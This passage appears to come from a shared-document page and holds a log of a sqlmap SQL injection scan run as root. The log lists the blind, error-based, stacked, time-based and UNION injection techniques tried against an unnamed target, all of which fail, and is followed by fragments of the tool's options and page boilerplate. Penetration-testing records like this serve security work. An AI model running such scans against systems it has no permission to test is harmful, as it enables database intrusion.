nt - original value)' [07:22:33] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)' [07:22:33] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace ( original value)' [07:22:33] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Par ameter replace (original value)' [07:22:33] [INFO] testing 'Oracle boolean-based blind - Parameter replace (origi nal value)' [07:22:33] [INFO] testing 'Microsoft Access boolean-based blind - Parameter repl ace (original value)' [07:22:33] [INFO] testing 'SAP MaxDB boolean-based blind - Parameter replace (or iginal value)' [07:22:33] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY c lauses' [07:22:33] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY c lauses (original value)' [07:22:34] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses' [07:22:35] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses' [07:22:36] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORD ER BY clause' [07:22:36] [INFO] testing 'Oracle boolean-based blind - GROUP BY and ORDER BY cl auses' [07:22:37] [INFO] testing 'Microsoft Access boolean-based blind - GROUP BY and O RDER BY clauses' [07:22:37] [INFO] testing 'MySQL stacked conditional-error blind queries' [07:22:51] [INFO] testing 'Microsoft SQL Server/Sybase stacked conditional-error blind queries' [07:23:03] [INFO] testing 'PostgreSQL stacked conditional-error blind queries' [07:23:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [07:23:19] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)' [07:23:23] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)' [07:23:28] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause ' [07:23:32] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [07:23:38] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause' [07:23:50] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause (IN)' [07:23:53] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT ype)' [07:23:59] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (utl_ inaddr.get_host_address)' [07:24:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (ctxs ys.drithsx.sn)' [07:24:09] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause' [07:24:11] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' [07:24:11] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT VALUE)' [07:24:12] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX ML)' [07:24:12] [INFO] testing 'PostgreSQL error-based - Parameter replace' [07:24:12] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r eplace' [07:24:12] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r
eplace (integer column)' [07:24:13] [INFO] testing 'Oracle error-based - Parameter replace' [07:24:13] [INFO] testing 'Firebird error-based - Parameter replace' [07:24:13] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clau ses' [07:24:13] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clau ses (EXTRACTVALUE)' [07:24:13] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clau ses (UPDATEXML)' [07:24:14] [INFO] testing 'PostgreSQL error-based - GROUP BY and ORDER BY clause s' [07:24:14] [INFO] testing 'Microsoft SQL Server/Sybase error-based - ORDER BY cl ause' [07:24:14] [INFO] testing 'Oracle error-based - GROUP BY and ORDER BY clauses' [07:24:14] [INFO] testing 'MySQL > 5.0.11 stacked queries' [07:24:16] [INFO] testing 'PostgreSQL > 8.1 stacked queries' [07:24:24] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc)' [07:24:27] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [07:24:32] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)' [07:24:36] [INFO] testing 'Oracle stacked queries (DBMS_LOCK.SLEEP)' [07:24:40] [INFO] testing 'Oracle stacked queries (USER_LOCK.SLEEP)' [07:24:45] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [07:24:50] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)' [07:24:55] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [07:25:01] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind (comment)' [07:25:07] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [07:25:11] [INFO] testing 'Oracle AND time-based blind' [07:25:15] [INFO] testing 'Oracle AND time-based blind (comment)' [07:25:19] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [07:25:47] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns' [07:26:43] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns' [07:27:23] [INFO] testing 'MySQL UNION query (random number) - 11 to 20 columns' [07:28:20] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns' [07:29:08] [INFO] testing 'MySQL UNION query (random number) - 21 to 30 columns' [07:30:04] [INFO] testing 'MySQL UNION query (NULL) - 31 to 40 columns' [07:31:00] [INFO] testing 'MySQL UNION query (random number) - 31 to 40 columns' [07:31:52] [INFO] testing 'MySQL UNION query (NULL) - 41 to 50 columns' [07:33:04] [INFO] testing 'MySQL UNION query (random number) - 41 to 50 columns' [07:34:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [07:35:21] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns ' [07:36:19] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns' [07:37:25] [INFO] testing 'Generic UNION query (random number) - 11 to 20 column s' [07:38:30] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns' [07:39:33] [INFO] testing 'Generic UNION query (random number) - 21 to 30 column s' [07:40:25] [INFO] testing 'Generic UNION query (NULL) - 31 to 40 columns' [07:41:24] [INFO] testing 'Generic UNION query (random number) - 31 to 40 column s' [07:42:32] [INFO] testing 'Generic UNION query (NULL) - 41 to 50 columns' [07:43:42] [INFO] testing 'Generic UNION query (random number) - 41 to 50 column s' [07:44:37] [WARNING] User-Agent parameter 'User-Agent' is not injectable [07:44:37] [CRITICAL] all parameters appear to be not injectable. Try to increas e --level/--risk values to perform more tests. Also, you can try to rerun by pro viding either a valid --string or a valid --regexp, refer to the user's manual f or details [*] shutting down at 07:44:37
root@bt:/pentest/database/sqlmap#

K - o - N Z - o - La

Enviado por

Dados do documento

Título original

Direitos autorais

Formatos disponíveis

Compartilhar este documento

Compartilhar ou incorporar documento

Opções de compartilhamento

Você considera este documento útil?

Este conteúdo é inapropriado?

Direitos autorais:

Formatos disponíveis

K - o - N Z - o - La

Enviado por

Direitos autorais:

Formatos disponíveis

sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool http://sqlmap.org [!

--safe-url=SAFURL --safe-freq=SAFREQ --skip-urlencode --eval=EVALCODE

Você também pode gostar